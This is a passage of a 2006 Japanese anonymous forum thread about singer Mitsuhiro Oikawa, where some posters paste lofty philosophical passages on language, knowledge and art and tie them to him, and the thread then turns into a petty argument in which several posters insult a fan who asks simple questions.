今日も及川光博は美しかった。

812 :NO MUSIC NO NAME:2006/09/17(日) 03:18:04 ID:DM3QZ4ID
>>811
そんな事を言えば心理主義の側から反論が起こるかもしれません。
それは、「語の意味は心像だけでなく、心像と投影法(解釈の仕方)の両者から成るのであって、
語の意味を理解することは、心像とその投影法との二つが心に浮かぶことである
とすれば心像の解釈も唯一つに決まる。
心理主義でも問題ないではないか」というものです。
ですがこの反論者に対し、ウィトゲンシュタインは逆に聞き返します。
「投影法が心に浮かぶとはどういうことか?」 実は、それは結局心像を理解するための対応表が心に浮かぶことでしかありません。
そして、その対応表も結局は心像です。
とすれば、その対応表の投影法も無数にあることになります。これでは無限後退です。
対応表の解釈を決める対応表の解釈を決める対応表の・・・・・・とやっていてはいつまで待っても語の意味を理解できません。
こんな馬鹿な話はありません。現実には、私たちはほんとんど瞬間的に語の意味を理解しているというのに!

813 :NO MUSIC NO NAME:2006/09/17(日) 03:18:07 ID:4hgH398G
>>810さn
逍遥遊。
それはいつも彼の中で漂うものを自由に遊ばせ
毎日生まれ変わる美しさと醜さの天秤が
どちらに傾くかそれによって日々流動するものと思う。
人の精神構造は、先人が行った観念の枠を飛び越え
進化するものと私は思う。


814 :NO MUSIC NO NAME:2006/09/17(日) 03:23:25 ID:4hgH398G
>>812さn
心象風景や原風景の投影はやはり流動的なものであって
ある一つの音楽を聴いたとしてもそれが毎日同じものであったとすれば。
これは緩慢至極。心の怠惰でありジャンクであると思う。
毎日の心の動きを投影してある音楽を聴いてhighになる事も有れば。
ただ流れる音楽と言葉を空に浮かせているだけの事もある。


815 :NO MUSIC NO NAME:2006/09/17(日) 03:23:40 ID:DM3QZ4ID
>>813
そうだろうか?
アウグスティヌスは、語の種類の違いについては何も言及していない。
私が思うに、言語の習得についてアウグスティヌスのように記述する人は、まず「机」、「椅子」、「パン」のような名詞と人名、
その次にある種の活動や性質の名前を考え、残りの語については、いずれ自然に分かるだろうぐらいの気持ちでいる。
ここで、次のような言語使用の場面について考えてほしい。
私が誰かをお使いにやるとする。私は彼に「5個の赤いリンゴ」と書いてあるメモを渡す。
彼は店の人にそのメモを渡す。店の人は「リンゴ」と書いてある箱を開け、
それから表を見て「赤い」という語を探し、それに対応する色見本を見つける。
そして 彼は数字を暗記していると仮定する
「5」まで数え、一つ数える度に色見本と同じ色のリンゴを箱から取り出す。

このように、あるいはこれと似たように、人は語を使う。
ある人が言う。「しかし、どこをいかにして「赤」という語を探すべきか、「5」という語で何を始めるべきかを、店の人はどのようして知っているのか?」
ウィトゲンシュタインが言う。私は、とにかく、店の人が私が記述したとおりに振舞うと仮定しているのだ。
説明はどこかで終わりになる。
ある人が言う。しかし「5」という語の意味は何か?
ウィトゲンシュタインが言う。ここではそうしたことは全く問題ではない。
「5」という語がどのように使用されているかということだけが問題なのだ。

つまり及川光博は古い考え方と対比し、それを背景に置くことによってのみ、新しい思想は正しく理解されうるであろう。と言っている様に思う

816 :NO MUSIC NO NAME:2006/09/17(日) 03:27:28 ID:DM3QZ4ID
及川光博の言う「理想論」だがこれはケプラーの諸法則、
膨大な量の観察に合致している。
もし仮に、惑星が微生物から構成されていることが判明したとしても、この諸法則は変化しない。
ケプラーの考えでは、生物(天使)が惑星を誘導し、惑星は文字通り天体の調和に従って動くことになっていた。
彼は、「天体のメロディー」が、楽譜とプラトンの単純な地理体系に基づく惑星体系から成るメロディーであることを証明しようとしていた。
ケプラーの諸法則は、天文学者がこのアイデアを科学作品のリズムに使うのをやめた後でも変わらない。
つまり彼の諸法則は、天文学的現象が生物学的か非生物学的かという問題から「中立」なのである。
地理学において「地理学は地球の構造を扱う」という単純な言明から出発できるように、
天文学においても「天文学は星や銀河などを扱う」という単純な言明から出発できる。
こういう言明は、特定の理論をあらかじめ締め出すような仮定を一切含まないので、幾つかの困難を避けられることは明らかだ。
やろうと思えば、「宇宙論」という言葉に、自分が論じたい物事の最大集合を割り当てることだってできなくはない。

そういう男なんだろう。及川光博は。

817 :NO MUSIC NO NAME:2006/09/17(日) 03:28:57 ID:4hgH398G
例えばある「美しいもの」を限定しそれを掴んだように思えても。
明日には手から離れてしまう事もある。
空高く登りつめてドラゴンが泳ぐようなhighなこともあれば
簡単に地に落ち泥に塗れることも然り。

「美」という観念は、そういった種類の心の産物であり。
すがりつき贖い懇願して呼び起こすものではないと思う。
だから。
私は及川光博の音楽を毎日紐解いて。
それを注意深く確認するものである。

818 :NO MUSIC NO NAME:2006/09/17(日) 03:33:21 ID:DM3QZ4ID
及川光博が常々言ってきたことだが、
信念が知識と同一であるのは、それが(1)真であり、(2)確実であり、(3)信頼できるプロセスによって得られた場合である。

しかし「プロセス」という語は極めて不十分である。
推論をプロセスと呼ぶこともできるが、
その場合でも「信頼できない」というのは間違った方法について言われることであって、
一般に考えられているように偽な前提について言われるものではない。
ある記憶は信頼できるプロセスによって得られた、と言うことはできるだろうか?
私が思うに、おそらく、[プロセスという語で、] 実際に起こったことと、
その記憶を思い出すこととを結ぶ因果的プロセスを意味するなら、
「記憶は信頼できるプロセスによって得られた」と言うことができる。
それゆえ私たちは、信頼できるプロセスによって得られた信念は、
信念ではない何かによって因果付けられているか、あるいは真な信念を生むために多少なりとも頼ることのできる
随伴物(accompaniment)を伴わなければならず、
この因果の連鎖の中で、他の仲介的な信念が生じるなら、
それらも全て真な信念でなくてはならない、と言えるかもしれない。


819 :NO MUSIC NO NAME:2006/09/17(日) 03:36:41 ID:4hgH398G
>>815
まさに。古きを訊ね新しきを知る。
古きを知らずば新しきを追う事は不可。
ゆるぎないスタチュとなる根幹はあの人には確実にあるように思う。

今ある固定的な美や観念を疑うことから始める。
疑惑はクリスティのように新たな発見を伴なう一種の発見の儀式だ。

それがホワイトライト・ホワイトヒートかあるいはブラックアウトするような
事柄でも、発見はつねに新しい友達と手をつないでやってくる。

820 :NO MUSIC NO NAME:2006/09/17(日) 03:42:25 ID:4hgH398G
知識は
教養から生まれる。
先人の言葉や行いを以って疑惑を抱きつつそれを感受する。
それがやがて信念となり
その人の心に定着しやがて形となって世の中に出る。
そこまでにたどり着くのにはいかなる困難艱難をくぐり抜け葛藤し
自分に憤怒しながら辿りつくものと考える。
そこから生まれるXTCとそれを実現させるスピリチュアルフォースがあるかどうかが
表現者であるか否かの分かれ道と言えよう。

821 :NO MUSIC NO NAME:2006/09/17(日) 03:50:39 ID:4hgH398G
そのプロセスは。
葛藤 混沌 怒り 弱さ 後悔 愛 至福 そして畏れなど。
数え切れぬ心の動きによって創られる。

及川光博は。そこに留まってはならぬ。

いくつかの困難や苦悩を以って少しく
そこか不幸であって欲しい。これは御幣が有るが真実の深淵を見るために
必要なものである。
決して悪魔思想や人を呪うことではなく。
少しく不幸であることで葛藤を得、更に前に進む為の思考の行程を得るための
手段としてのものである。

古くから多くのアーティストがそうであったように。

ああ。君は幸福であってなんか欲しくない

822 :NO MUSIC NO NAME:2006/09/17(日) 05:25:59 ID:xA82LZ4i
音楽が語ることを純粋に音楽的に理解できる人は、比較的少ない。
音楽作品はある種のイメージを喚起するもので、
もしそれが起こらなければ、作品は理解されないか、
あるいは何の役にも立たないというような、誤った陳腐な見解が蔓延している。
他の芸術に対しては、誰もそんなことを要求せず、その素材のもたらす効果に満足している。
もっとも、他の芸術では、素材のテーマ、つまり表現されたテーマが、平均的な人間の理解力にも自ずと明らかになるものであるが。
だが、音楽にはそのような素材のテーマが欠けているので、
人々は素材の効果の背後に純形式的な美しさや詩の言葉の運びを探そうとする。
 かつてショーペンハウエルは、その驚くべき思索によって音楽の本質を言い当てた。
「作曲家は、世界の内的な本質を明らかにし、その最も深遠な英知を、理性では理解できない言語で紡ぎ出す。
それはちょうど、催眠術にかかった人が、目覚めているときには覚えていないことについて口にすることに似ている。
しかしそのショーペンハウエルでさえ、後になって、理性では理解できない言語の詳細を、私たちの概念に翻訳しようと試みたんだよ
さて及川光博はどう思っているのか

823 :NO MUSIC NO NAME:2006/09/17(日) 05:29:46 ID:xA82LZ4i
ただそうは言っても
抽象化つまり認識可能なものへの還元をその機能とする人間の言語の概念へ翻訳すれば
理解不可能でただ感得のみ可能な世界の言語が消滅してしまうことぐらい、
及川は承知していたはずである。

だがそれでも、彼の哲学者としての目的世界の本質、
すなわち量ることのできない豊かさを概念によって表現することを考えれば、
彼の行ないは正当なものである。たとえ概念の貧困があまりに明白だったとしても、である。
ワーグナーも、音楽家として直接的に見たものを普通の人々に伝えようとしたとき、
ベートーヴェンの交響曲に標題を付けた。これも正しい行ないである。
こういうことが一般的に行なわれるようになると、深刻な弊害が現れてくる。
つまり、彼らの行ないの意味が逆転し、人々は音楽の中に詩の言葉の運びや [作者の] 感情を当然のように探そうとするのだ。
実際には、ワーグナーの場合、
音楽を通じて受け取った「世界の本質」についての印象が彼の中で創造的になり、
他の芸術の素材に姿を変えて詩の形で現れるのだ。
しかし、その詩に現れる言葉の運びと作者の感情は、もともと音楽の中に含まれていたものではなく、
ただ詩においては容認されない素材であるに過ぎないのである。
なぜなら、このように直接的で汚れのない純粋な表出は、主題と分かちがたく結びついた詩という芸術を拒絶するからである。

この純粋直観の能力は極めて稀であり、高度な能力を持った人間のみに備わっているものである
彼、すなわち及川光博はこの能力をもっているのか?
否、能力を発揮できる環境に身をおいているのか?
こればベイベには憶測で語るしかない



824 :NO MUSIC NO NAME:2006/09/17(日) 18:16:39 ID:TucKy1uv
音楽はもっと楽しめばいいんだよー。

>822
>音楽作品はある種のイメージを喚起するもので、
>もしそれが起こらなければ、作品は理解されないか、
>あるいは何の役にも立たないというような、誤った陳腐な見解が蔓延している。

そう?

>他の芸術では、素材のテーマ、つまり表現されたテーマが、平均的な人間の理解力にも自ずと明らかになるものであるが。

そう?

825 :NO MUSIC NO NAME:2006/09/17(日) 19:28:23 ID:qh4RR+g4
>>824
まさに稚拙。きちんと自分の理論、哲学を語れないなら余計な書き込みはするな
そのような判断は、もっともくだらない観念、すなわち因襲的な構成法というものから生まれ出る。
その判断によれば、詩における特定の過程は、音楽におけるある種の音の強弱や速度と完全に呼応して進行せねばならないことになる。
しかしこの呼応関係そのもの、あるいはもっと深い呼応関係でさえ、見かけでは反対のことが表現されている場合でも起こりうる。
それゆえ、例えば繊細な情念が速く情熱的なテーマによって表現されることもある。
なぜなら、その激しさから更に強い激しさへと有機的に発展するからである。
しかし、こうした諸々のことを度外視して考えると、こうした構成法は即座に却下される。
なぜならそれが因襲的であり、全ての人にとって、音楽を「詩作し、思考する」一つの言語へと作り変えようとするものだからである。

826 :NO MUSIC NO NAME:2006/09/17(日) 19:34:47 ID:TucKy1uv
書き込み禁止とか言われてしまった。
及川の音楽が好きなだけではいけないんだね。

827 :NO MUSIC NO NAME:2006/09/17(日) 19:38:29 ID:TucKy1uv
>825
>そのような判断は、もっともくだらない観念、すなわち因襲的な構成法というものから生まれ出る。

そのようなってどのような?
そもそもあなたは及川の音楽が好きなの?嫌いなの?

こういう単純な質問さえも稚拙で却下なのかしらね。

828 :NO MUSIC NO NAME:2006/09/17(日) 19:41:23 ID:qh4RR+g4
>>826
卑下し同情を得ようとする気持ちは察するに値するが
意見には何らかの有用性を持たねばならないし、そのことを真剣に考える必要がある。
私たちの思考と行為を明晰なものにしなければならない。
さもなければ、意見とは私たちがやめねばならない性癖であり、かつ、哲学がそういうものであることを調べる行為ということである。
その場合「哲学はナンセンスである」が哲学の中心命題になってしまう。
しかしたとえその場合であっても、その命題は真剣に考慮されるべきである。
ウィトゲンシュタインのように、その命題は重要なナンセンスである、という振りをするべきではない!
哲学は、科学的命題や日常的命題を取上げ、それらを原始的な用語(primitive term)と定義などを持った一つの論理体系の中で提示しようとする。
本質的に、ある哲学はある定義の体系か、あるいは、非常によくあることだが、定義の与え方についての記述の体系である。

829 :NO MUSIC NO NAME:2006/09/17(日) 19:43:25 ID:qh4RR+g4
>>827
もちろん私はムーアのように定義は私たちがその命題によって今まで何を意味していたのかを説明するものだ
と言う必要はないと思う。
むしろ定義とは、未来において私たちがその命題をどのように使おうと意図しているかを示すものだと思う。
ムーアだったら、「どっちも同じことさ。
誰かが『これはテーブルだ』という命題によって意味したことを、哲学が変えることなどない」と言うだろう。
しかし私には、そういうことも起こりうると思われる。
なぜなら、意味とは大抵は潜在的なものであり、従ってその変化が露になるのは非常に稀で、
境界線の引きづらい場合に限られるからである。
また、時として言われることだが、哲学はそれまで曖昧で混乱していた概念を明確にし区別をするだろうが、
これは明らかに、未来の意味のみを確定するために行なわれることである。
いずれにせよ明らかなことは、
定義は少なくとも将来の意味を与えるべきであり
単にある特定の構造を得るための美しい方法を与えられればよいわけではない、ということである。

830 :NO MUSIC NO NAME:2006/09/17(日) 19:44:54 ID:TucKy1uv
>829
アンカーミス?
どこに対しての言葉なのかな。

831 :NO MUSIC NO NAME:2006/09/17(日) 19:46:26 ID:qh4RR+g4
>>827
単純な質問に対し敵意や尊大さで応じているという評判するが
初心者や知識の無い人には反射的に無礼な態度を取っているように時には見えるかもしれない。
しかし実際はそうではない。
悪びれずに言うならば、私は質問をする前に、自分で考えたり下調べしたがらない人達に敵意を持っているのだ。
そういう人達は時間を無駄にする
貴女は一方的に質問を行い、そして他のより興味深い質問や答えるに足る人に対して費やせた時間を無駄にする。
このような人を私は「敗者(losers, ルーザー)」と呼ぶ(そして歴史的な経緯でたまに「lusers」と綴る)。

832 :NO MUSIC NO NAME:2006/09/17(日) 19:50:21 ID:TucKy1uv
>831
>そして他のより興味深い質問や答えるに足る人に対して費やせた時間を無駄にする。
先にそちらの方に対して、時間を費やしていただいて結構ですし、無視してもらっても構いませんよ。

833 :NO MUSIC NO NAME:2006/09/17(日) 19:54:20 ID:qh4RR+g4
>>832
稚拙で低俗な貴女にも寛大に対処していることを無駄だというのか?
私は次の問いを重要だと考えている。
芸術(音楽)はゆたかさと富のどちらに属するべきなのか?
音楽はどちらの召使であるべきなのか?
あるいはもっと言えば、音楽は富の奴隷であるべきなのか、ゆたかさの友人であり伴侶であるべきなのか?
もっとはっきり言うのなら、音楽はこれを無気力に愛好するだけの狭い階級に制限されるべきなのか?
それとも全ての人の慰めと喜びであるべきなのか?
つまるところ、私も貴女の様な低俗な人間でさえもは音楽を持つべきなのか?
それともみせかけだけのの音楽を持つべきなのか?

834 :NO MUSIC NO NAME:2006/09/17(日) 19:57:04 ID:TucKy1uv
>833
無駄にするって、あなたが書いたんじゃないですか。

>貴女は一方的に質問を行い、そして他のより興味深い質問や答えるに足る人に対して費やせた時間を無駄にする。
この「貴女」って、稚拙で低俗な私のこをと指してるのではないの?

835 :NO MUSIC NO NAME:2006/09/17(日) 19:59:43 ID:TucKy1uv
>833
それ、このスレで語るべき議論?
及川とは全く関係ないとは言わないけど。

836 :NO MUSIC NO NAME:2006/09/17(日) 19:59:44 ID:qh4RR+g4
>>833
文章読解力さえももたないほどに落ちぶれたのか、日本民族は。嘆かわしい
さすがに>>833に示した私からの単純な問いかけには答えられると思うのだがそれはどうだろうか?

837 :NO MUSIC NO NAME:2006/09/17(日) 20:01:24 ID:/EuUChWZ
>>835
ケンカ売ってるオマエこそスレ違いだお。ギガキモス



〓しょうこ〓

838 :NO MUSIC NO NAME:2006/09/17(日) 20:03:53 ID:TucKy1uv
音楽を持つって。

839 :NO MUSIC NO NAME:2006/09/17(日) 20:07:47 ID:/O4ietay
>>838
貴女の煽り行為が悪質かつ低俗な典型的荒らし行為だと承知しつつあえて続けさせていただく

確かに大多数の人にとって、>>833は何の実際的な重要性を持たないということも、十分ありうる。
ほとんどの人にとっては、音楽が現在置かれている状態のみが
主として文化的な人々の間に音楽が存在しうる唯一の状態と思われるし
そうした人々は、音楽の現在の目的と傾向に(先述のごとく無気力に)満足しているからである。
私自身は、現在の音楽の状態には全く不満であり、事態は非常に深刻なものだと考えている。
だから私は、他の人々にもこの不満を分かってもらいたいと思わずにはいられない。
そのために私は、疑いなく音楽と公衆に溢れんばかりの善意を持つベイベが居並ぶ今宵のような機会に不満をたずさえ
礼儀破りを承知で書き込みしているのである。
こんな失礼を犯す私がただ一つ弁明するとすれば、
これほど重大な事態についての真剣な見解であれば何であろうと知りたがるベイベの真摯さを、私は信じているということである。
だから私は、音楽はゆたかさの伴侶であるべきか、富の奴隷であるべきかという問題は、
もし音楽が人類にとって重要なものであるならば(この点を否定する者はいないと思うが)
極めて実際的な重要性を持つ、と言いたい。

840 :NO MUSIC NO NAME:2006/09/17(日) 20:17:00 ID:TucKy1uv
煽るつもりはないのだけど、

>芸術(音楽)はゆたかさと富のどちらに属するべきなのか?

から

>つまるところ、私も貴女の様な低俗な人間でさえもは音楽を持つべきなのか?

に至る過程が書かれてはいるけれど、低俗な人間でさえも音楽を持つべきなのか?
の問いに対して、持つべき(べきっていう強制的な語感が気に入らないけど)と
答えると、どちらに属することになるのかな。

841 :NO MUSIC NO NAME:2006/09/17(日) 20:24:45 ID:/O4ietay
>>840
自分の答えが導く意義、意味さえも見出せないのですか?
それではまるで話にならない。いい加減に荒らし行為はやめていただきたい。
これではまさに時間の無駄。私の貴女に対する配慮も憂慮もまったく無駄になってしまう


842 :NO MUSIC NO NAME:2006/09/17(日) 20:26:10 ID:/O4ietay
芸術の目的、すなわち、なぜ人はわざわざ芸術など育てて、実践するのかということを考える際
私は多少なりとも自分が知っている唯一の人間の標本から一般化するしかない。
その標本とは、要するにこの私である。
そこで私の望むものは何かと考えてみると、私はそれに幸福という以外の名前を与えることができない。
私は生きている限り幸福でありたいと思う。
死については、経験したことがないので、いかなるものか全く分からない。よって考えようもない。
生きるというのがどういうことかは知っているが、死ぬというのがどういうことかは、推測することさえできない。
そのようなわけで、私は幸福でありたいし、一般化して言えば、時には楽しくもありたいのだ。
そして、これが普遍的に誰もが抱く願望ではないと信じることは困難である。ゆえに、この目的に沿うものであれば何であれ、私は全力をもって育てよう。
さて、自分の人生についてさらに考えると、二つの支配的な気分が私の人生に影響を及ぼしていることに気づく。
いや、気づくように思われる。
うまい言葉が見つからないので、これを精力的な気分と怠惰な気分と呼んでおこう。
ある時は一方が、またある時は他方が、いつでも私の中で満足を求めて叫んでいる。
精力的な気分が支配的なときは、私は何かをせずにはいられない。何もしないと、落ち込んで不幸な気分になる。
怠惰な気分が支配的なときは、休息して、楽しいものや恐ろしいものなど様々な心像のうえに心を遊ばせないと、どうにも耐えがたくなる。
そういう心像を心の中に作ってくれるのは、私自身の経験や、生者や死者との思想の交流である。
もし諸事情によりこの怠惰な気分を涵養することが許されない場合、
何とかして精力的な気分を刺激して怠惰な気分にとって代わらせ、
再び幸せな気分になれるまでの間、苦痛な時期を過ごさざるをえなくなる。
だから、私を幸福にすることを務めとする精力的な気分を喚起する手段がない場合、私は怠惰な気分に支配されたまませっせと働かねばならず、
そうなるともう本当に不幸な気持ちになる。
ほとんど死んでしまいたいと思うぐらいだ。

死ぬというのがどういうことかは、知らないのだけれども。

843 :NO MUSIC NO NAME:2006/09/17(日) 20:28:07 ID:/O4ietay
さらに言うと、怠惰な気分のときは思い出が私を楽しませてくれるのに対し、精力的な気分のときは希望が元気づけてくれる。
そういう希望は、時には巨大で真剣なもので、時には取るに足らないものである。
しかし、希望がなければ幸福な精力もない。
また、精力的な気分を満足させるには、暇つぶし以上の成果のない仕事(要するに遊び)をするだけでいい場合もある。
だがそういうのはすぐに飽きて詰まらなくなってしまう。そういう場合の希望はあまりに詰まらなく、半分ぐらいは本当の希望ですらない。
まとめるなら、私の主人であるこの気分を満足させるには、何かを作っているか、もしくは作っている振りをしていなければならないのである。
さて、私の信じるところでは、人によって比率は異なるものの、
全ての人の生活はこの二つの気分の混合である。こう考えると、
なぜ人々がいつも、程度に差はあれ骨を折ってまで芸術を育て、
これを実践するのかの理由も説明がつく。
そうでなければ、なぜ人々は、わざわざ芸術に手を出して、生活のために必要な労働以外に余計な仕事を付け加えたりするだろう?
芸術は人々の楽しみのためになされたに違いないのだ。
なぜなら、一人の人間が芸術を生み出すためだけに他人に養ってもらうことは、
高度に発達した文明において初めて可能になったことであり、反対に、過去に生存の証を残してきた人は例外なく芸術を実践してきたからである。
芸術作品の与える目的が、芸術を意識することのできる感覚の持ち主を常に楽しませることであるという点は、誰も否定しないであろう。
芸術は、それによって一層幸せになれる人のために存在した。
そういう人の怠惰な、あるいは落ち着いた気分は芸術によって慰められたのだ。
そうして、この気分につきまといがちな空虚感という悪癖は、心楽しい沈思や夢想などに席を譲ったのである。
もっとも、この方法によって、その人が急に活動的で精力的な気分へ追い込まれたわけでもない。
もっとよく楽しみを味わおうと望むなら、ゆっくり味わうこともできたのだ

844 :NO MUSIC NO NAME:2006/09/17(日) 20:29:51 ID:/O4ietay
不安の抑制が芸術の果たすべき重要な機能の一つであることは、皆も同意してくれると思う。
しかしそうすると、次に、私たちはどのような犠牲を払ってこれを得ているのか、ということが問題となる。
私は、芸術の実践が人類の労働の総量を増やすことを認めた。
もっとも、長い眼で見れば、決してそうは思わないのだが。
しかし芸術が人間の労働量を増やしたとして、それで人間の苦痛までもが増したであろうか?
この問いに対して即座にイエスと答える人は、常にいる。
芸術を面倒な愚行と見なして嫌悪し、軽蔑する人には2種類のグループがある。
一つは信心深い禁欲主義者で、芸術を人が来世の幸不幸に専心することを妨げる現世のしがらみと見なしている。
この連中が芸術を憎む理由は、一言でいえば、芸術が人間の地上の幸福を増すからである。
このような人々のほかに、極めて合理的観点から人生の闘争を見て芸術を軽蔑する人々がいる。
彼らによれば、芸術は人間の苦痛な労働を増加させることによって奴隷制を助長しているという。
仮にこの見方が正しいとしても、なお問題があると思われる。
つまり、休息に喜びを加えるためなら、
苦痛な労働が増えることにも我慢するだけの価値はあるのではないだろうか、という問題である。
ただしその場合は、人々が条件面で平等であるという仮定が必要だが。
しかし私には、芸術の実践が苦しい労働を増やすというのは正しくないと思う。

845 :NO MUSIC NO NAME:2006/09/17(日) 20:30:44 ID:TucKy1uv
>841
荒らし行為じゃないと言ってるんですけど。

>だから私は、音楽はゆたかさの伴侶であるべきか、富の奴隷であるべきかという問題は、
>もし音楽が人類にとって重要なものであるならば(この点を否定する者はいないと思うが)
>極めて実際的な重要性を持つ、と言いたい。

私はゆたかさの伴侶であるべきか、富の奴隷であるべきかというのは、
別に重要な問題だとは思ってない。
あなたは「富の奴隷であるべき」とは思ってないから、あれこれ暴れてるんでしょ?
いろいろ理屈をこねてるけど、ゆたかさの伴侶であって欲しいと思ってるんではないの?

846 :NO MUSIC NO NAME:2006/09/17(日) 20:32:13 ID:/O4ietay
それどころか、もしそうであったなら、芸術など全く誕生しなかったはずである。
それゆえ、わずかでも文明の萌芽の見られる人々に芸術が認められることなどないであろう。
言い換えれば、私は、芸術が外的強制の結果生まれることはありえないと信じている。
芸術を生み出す労働は自発的なものであり、
一つには労働それ自身のために、一つにはそれを用いる人に喜びを与えるものを生み出すという希望のために行なわれる。
また、この余計な労働は、それが余計であるがゆえに、あの精力的な気分を満足させる。
その労働は、なす価値のある物を生み出し、そのおかげで労働者は仕事をしているあいだ前途に生き生きした希望を持つことができる。
その希望によって、絶対的で直接的な喜びが仕事に与えられるのである。
腕の良い職人が快調に仕事しているときは常に、この明確で感覚的な喜びが存在するということ、
そして仕事の自由と個性に比例して喜びも増すということ、こうしたことを芸術的感性を持たない人に説明するのは難しいだろう。
また、こうした芸術の生産、およびその結果である仕事における喜びは、
絵画や彫刻などの芸術作品の製作にだけあるのではなく、他の全ての労働の一部を成しているのであり、
またそうあるべきだということを、皆は理解せねばならない。
精力的な気分の要求は、このような仕事に取り組むことによってのみ叶えられるのだ。

従って、芸術の目的は人間の幸福を増大させることである。
そのために芸術は、余暇を楽しませるための美と面白い出来事を与えて人間が休息にさえ倦むことを防ぎ、
また仕事においては希望と身体的喜びを与える。要するに、芸術は人間の仕事を幸福なものにし、休息を豊かにするのである。
それゆえ、真の芸術とは人類に対する純粋な祝福である。

847 :NO MUSIC NO NAME:2006/09/17(日) 20:34:24 ID:/O4ietay
しかし「真の」という語は広い意味を持つ言葉である。
そこで、芸術の目的についてこのような主張から幾つかの実際的な結論を導くことを試みさせてほしい。
その結論は、この主題についてある論争を引き起こすことになるであろうし、また、私はそれを期待している。
というのも、表面的な無駄話をするならともかく、
芸術について真面目に語るときに、誠実な人なら誰もが考えているあの社会問題に向き合わないで済ませるのは不毛なことだからだ。
芸術は、それが豊穣か貧弱かにかかわらず、また誠実か空虚かにかかわらず、
その芸術の存する社会の表現なのであり、またそうであらねばならないのだから。
さて、まず第一に私に明らかなことは、
物事を深く広く見る人は芸術の現状に全く不満であり
同様に社会の現状にも不満であるということである。
昨今、芸術の復興が言われているけれど、
事実はというと、
今日、教養ある人の一部が芸術に熱狂していることは、この不満がいかに根強いものであるかを示しているに過ぎない。

848 :NO MUSIC NO NAME:2006/09/17(日) 20:37:26 ID:TucKy1uv
あれ?
途中でID変わってるね。
別人とも思えないんだけど、やられたのか?

849 :NO MUSIC NO NAME:2006/09/17(日) 20:39:36 ID:/O4ietay
>>845
すまないが貴女の文章読解力と文章構成力では意見の交換は不可能に思える
まずは教養をみにつけ己の基本的な、それでいて普遍的な考えをしっかりと持ってもらいたい
他人の考えや意見を批判するのならばまずは自分の考えをもたねばその権利さえもつことは許されない
権利をもたず批判のみを目的にする行為はまさにテロ行為と同様のものであり、さらなる争いの原因にしかならないことをわかって欲しい
貴女の俗世間的な書き方をあえてさせていただくと「スレ違い」なのである

850 :NO MUSIC NO NAME:2006/09/17(日) 20:41:27 ID:/O4ietay
>>848
IDが永遠のものだと思っているのですか?
自分の世界が全てなのですか?自分を中心に物事を考えるとは嘆かわしい
ちなみにやられたとはどういう意味なのですか?

851 :NO MUSIC NO NAME:2006/09/17(日) 20:41:47 ID:TucKy1uv
どこかであなたを批判したかしら?

852 :NO MUSIC NO NAME:2006/09/17(日) 20:43:13 ID:TucKy1uv
いや、パソコン切り替えたりするヒマあったのかなーって。
わざわざ回線切ったりとか。
まさか携帯とPCを使い分けてるなんて思わないし、
日付も変わってないし、なんでかなと。

853 :NO MUSIC NO NAME:2006/09/17(日) 20:43:54 ID:TucKy1uv
やられたって、意味がわからければ、気にしないでいいよ。

854 :NO MUSIC NO NAME:2006/09/17(日) 20:52:26 ID:/O4ietay
>>852
貴女の狭い世間や浅はかな知識で世の中全てが理解できないという何よりの証拠です
>>849に示した通りだせ。これ以上荒らすのは本当にやめていただきたい

855 :NO MUSIC NO NAME:2006/09/17(日) 20:54:47 ID:TucKy1uv
あなたは世の中の全てが理解できてるというの?そりゃすごい。
何を理解してるのか教えていただきたいが、低俗な私には理解できないんだろうな。

856 :NO MUSIC NO NAME:2006/09/17(日) 21:04:09 ID:iaoJv5ky
>>855
馬鹿はキエロ

857 :NO MUSIC NO NAME:2006/09/17(日) 21:05:30 ID:TucKy1uv
お?新手?
それとも私の狭い世間や浅はかな知識で理解できない方法でIDを変えてきたのかな?

858 :NO MUSIC NO NAME:2006/09/17(日) 21:07:08 ID:/O4ietay
>>857
いつまで幼稚な荒らし行為を続けるつもりなのですか?
理解とは例による説明が全てなのか?
もっと深い説明があるのではないか?
または、説明の理解とはもっと深いものでなければならないのではないか?
そうすると私自身も、より深い理解とやらを持っているのか?
私は、私が [例を使った] 説明において与える以上のものを持っているのか?
それにしても、私がより多くのものを持っているというこの感情は、どこから来るのだろう?

859 :NO MUSIC NO NAME:2006/09/17(日) 21:09:52 ID:TucKy1uv
さっきは携帯からだったの?
sage忘れてたようだけど、いいタイミングででてきたね。

私を荒らしだと思うならスルーすればよろしかろ。

860 :NO MUSIC NO NAME:2006/09/17(日) 21:10:48 ID:/O4ietay
「理解が進む」とは、
従っているルールを複数見いだすことができた・・・ということ
(最初の理解で発見したルール以外のルールにも従っていることがわかる・・・ということ)
である。
異なる理解が複数個重なると、理解が進む、という感じでしょうか。
ですから>>857は何も理解していないし理解を得ようともしない行為は恥ずべき事だと気づいて欲しい

あなたの先示した事を例に言わせてもらえるならば
「なぜ煽りそして荒らすのですか?」この単純な質問には答えてもらえるのだろうか?

861 :NO MUSIC NO NAME:2006/09/17(日) 21:10:50 ID:TucKy1uv
>858
理解とは〜以降の文章は自問かな?
ならば、こんなところに書かないで日記にでも書いておいで。

862 :NO MUSIC NO NAME:2006/09/17(日) 21:11:43 ID:TucKy1uv
>860
私は煽ってるつもりはないし、荒らしているつもりもない。
と何度も答えましたが。

863 :NO MUSIC NO NAME:2006/09/17(日) 21:12:15 ID:iaoJv5ky
自分の都合が悪くなると相手の自作自演だと思いこみたくなる馬鹿

864 :NO MUSIC NO NAME:2006/09/17(日) 21:14:17 ID:/O4ietay
では自分の荒らし行為さえわからない人は無視させていただこう
私の配慮が伝わらず残念だ。及川光博のファンであるならばもうすこしまともな人間だと思うのだが・・・・

865 :NO MUSIC NO NAME:2006/09/17(日) 21:14:24 ID:TucKy1uv
自演でないならそれでもいいけど、>860は、なぜあなたを相手にしないのかな。
音楽について語ろうとしてないから?
そもそも議論に参加しようとする意思が見えないから?

866 :NO MUSIC NO NAME:2006/09/17(日) 21:15:25 ID:TucKy1uv
ここで及川の名前を出すのはやめてね。
あなたにベイベであるための資格をうんぬん言われる筋合いはないから。

867 :NO MUSIC NO NAME:2006/09/17(日) 21:17:20 ID:/O4ietay
ここで及川光博の名前を出さないで語れとはこれいかに?
ここは及川光博のスレッドではないのか?

絶句するほど稚拙。支離滅裂。

868 :NO MUSIC NO NAME:2006/09/17(日) 21:17:24 ID:iaoJv5ky
>>862みたいな自覚症状の無い馬鹿は扱いに困る

869 :NO MUSIC NO NAME:2006/09/17(日) 21:19:07 ID:FhfPsSMV
ID:TucKy1uvはスルーしていきましょう!
音楽って本当に奥が深いよね
ミチーも学生時代に哲学を学んでいるからきっと深く考え込んじゃうタイプだと思う

870 :NO MUSIC NO NAME:2006/09/17(日) 21:20:47 ID:TucKy1uv
仲間がたくさん出てきたねー。

